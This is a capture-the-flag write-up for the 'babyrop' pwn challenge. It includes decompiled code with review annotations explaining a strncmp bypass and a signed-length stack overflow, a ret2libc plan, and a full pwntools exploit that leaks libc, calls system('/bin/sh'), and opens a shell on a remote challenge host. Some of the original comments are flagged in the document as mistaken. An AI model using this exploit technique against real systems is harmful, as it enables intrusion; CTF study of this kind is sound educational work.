
[OGeek2019]babyrop

Ubuntu 16

https://github.com/196011564/CTFQuestion/raw/master/OPPO_OGEEK/pwn/babyrop/libc-2.23.so


0x01


checksec

[*] '/home/zelas/Desktop/pwn/[OGeek2019]babyrop/pwn'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

main()

/*
 * Decompiled entry point (IDA pseudo-C, not compilable as shown).
 * Reads 4 random bytes from /dev/urandom, runs the input check in
 * sub_804871F() and forwards its one-byte result to sub_80487D0(),
 * where it is used as a read() length.
 */
int __cdecl main()
{
    int buf; // [esp+4h] [ebp-14h] BYREF   -- the 4 random bytes; left uninitialised if open() fails
    char v2; // [esp+Bh] [ebp-Dh]          -- plain char: values 0x80..0xff from sub_804871F() become negative here if char is signed (i386/gcc)
    int fd; // [esp+Ch] [ebp-Ch]

    sub_80486BB();
    fd = open("/dev/urandom", 0); // 0 == O_RDONLY; the descriptor is never closed
    if ( fd > 0 )
        read(fd, &buf, 4u); // return value unchecked: a short read leaves buf partly stale
    v2 = sub_804871F(buf); // int -> char narrowing: (unsigned __int8)0xff arrives in sub_80487D0() as -1
    sub_80487D0(v2);
    return 0;
}

sub_804871F()

/*
 * Input check: formats the random value a1 as decimal into s, reads up to
 * 0x20 bytes of user input into buf, and compares the two with strncmp()
 * over strlen(buf) bytes.  Returns buf[7] as an unsigned byte; main()
 * passes that byte on to sub_80487D0() as a read() length.
 *
 * Weaknesses visible in this function (defender's view):
 *  - the comparison length comes from the user-controlled string, so input
 *    starting with '\0' gives strlen() == 0 and strncmp(..., 0) == 0: the
 *    check passes without knowing a1.  Fix: compare a fixed length derived
 *    from s (e.g. strlen(s) + 1), not from the input;
 *  - buf[v5 - 1] = 0 is done without checking v5 > 0: on EOF (v5 == 0) it
 *    writes buf[-1], i.e. the last byte of s, and on error (v5 == -1) buf[-2].
 */
int __cdecl sub_804871F(int a1)
{
    size_t v1; // eax
    char s[32]; // [esp+Ch] [ebp-4Ch] BYREF    -- decimal rendering of a1
    char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF -- user input; sits directly after s on the stack
    ssize_t v5; // [esp+4Ch] [ebp-Ch]

    memset(s, 0, sizeof(s));
    memset(buf, 0, sizeof(buf));
    sprintf(s, "%ld", a1);
    v5 = read(0, buf, 0x20u); // 0x20 == sizeof(buf); read() itself adds no terminator
    buf[v5 - 1] = 0; // drops the trailing newline; v5 <= 0 is not handled (see header)
    v1 = strlen(buf); // a leading \x00 stops strlen() early, so the exit() below is never reached
    if ( strncmp(buf, s, v1) ) // compares only strlen(buf) bytes -- zero bytes when buf[0] == '\0'
        exit(0);
    write(1, "Correct\n", 8u); // original note: "the read() address is leaked here".  NOTE(review): this write leaks nothing by itself; the script below leaks write@got via puts, not read()
    return (unsigned __int8)buf[7]; // user-controlled byte that becomes the read() length in sub_80487D0()
}

sub_80487D0( )

/*
 * Final read into a 231-byte stack buffer.  a1 is the byte returned by
 * sub_804871F() (taken from user input), narrowed to char by main().
 *
 * NOTE(review): the original comment blames the a1 == 127 branch, but
 * 0xC8 (200) < sizeof(buf) (231), so that branch cannot overflow.  The
 * overflow is in the else branch: with a signed char (i386/gcc) any input
 * byte >= 0x80 is negative, and converting e.g. -1 to read()'s size_t
 * parameter yields 0xffffffff on i386, so read() may write far past buf.
 * Fix: take the length as an unsigned type and clamp it to sizeof(buf)
 * before calling read().
 */
ssize_t __cdecl sub_80487D0(char a1)
{
    ssize_t result; // eax
    char buf[231]; // [esp+11h] [ebp-E7h] BYREF

    if ( a1 == 127 )
        result = read(0, buf, 0xC8u); // original note: "the read() here has an overflow bug" -- see NOTE above; 200 bytes fit in 231
    else
        result = read(0, buf, a1); // a1 < 0 converts to a huge size_t -> stack buffer overflow
    return result;
}

0x02


思路 ret2libc

1.\x00跳过strncmp()

2.泄露write()地址

3.计算system 和str_bin_sh的地址

4.执行system

s 0xE7H
ebp 0x4
ret puts_plt
puts_ret main()
arg read_got
s 0xE7H
ebp 0x4
ret system
sys_ret 0xdeadbeef
arg bin_sh

0x03


# Exploit script from the writeup (pwntools).  It relies on the weaknesses
# visible in the decompiled functions above: strncmp() with a user-controlled
# length, a signed-char read() length, and a No-PIE binary (see checksec).
from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 29506)
# io = process(['./pwn'])
elf = ELF('pwn')
# Leading NUL -> strlen(buf) == 0 -> strncmp(..., 0) passes; byte 7 (0xff) is
# returned by sub_804871F() and reaches sub_80487D0() as (char)-1.
payload1 = b'\0' * 7 + b'\xff'
io.sendline(payload1)
io.recvuntil(b'Correct\n')

# 0xE7 is buf's offset from ebp in sub_80487D0(); +4 covers the saved ebp.
padding = 0xe7 + 0x4
write_got = elf.got['write']
puts_plt = elf.plt['puts']
main_addr = 0x8048825  # hard-coded; only stable because the binary is No PIE
# NOTE(review): the stack sketch above says read_got; this script leaks write@got.
payload = b'a' * padding + p32(puts_plt) + p32(main_addr) + p32(write_got)
io.sendline(payload)
write_addr = u32(io.recv(4))
print('[+] write_addr', hex(write_addr))

# LibcSearcher variant kept for reference; the offline libc-2.23.so is used below.
# libc = LibcSearcher('write', write_addr)
# libc_base = write_addr - libc.dump('write')
# system = libc.dump('system') + libc_base
# bin_sh = libc.dump('str_bin_sh') + libc_base

libc = ELF('libc-2.23.so')
libc_base = write_addr - libc.sym['write']
system = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base', hex(libc_base))
print('[+] system_addr', hex(system))
print('[+] bin_sh_addr', hex(bin_sh))

# Second pass through main() after the ret-to-main above; same check bypass.
io.sendline(payload1)
io.recvline()
payload = b'a' * padding + p32(system) + p32(0xdeadbeef) + p32(bin_sh)
io.sendline(payload)

io.interactive()

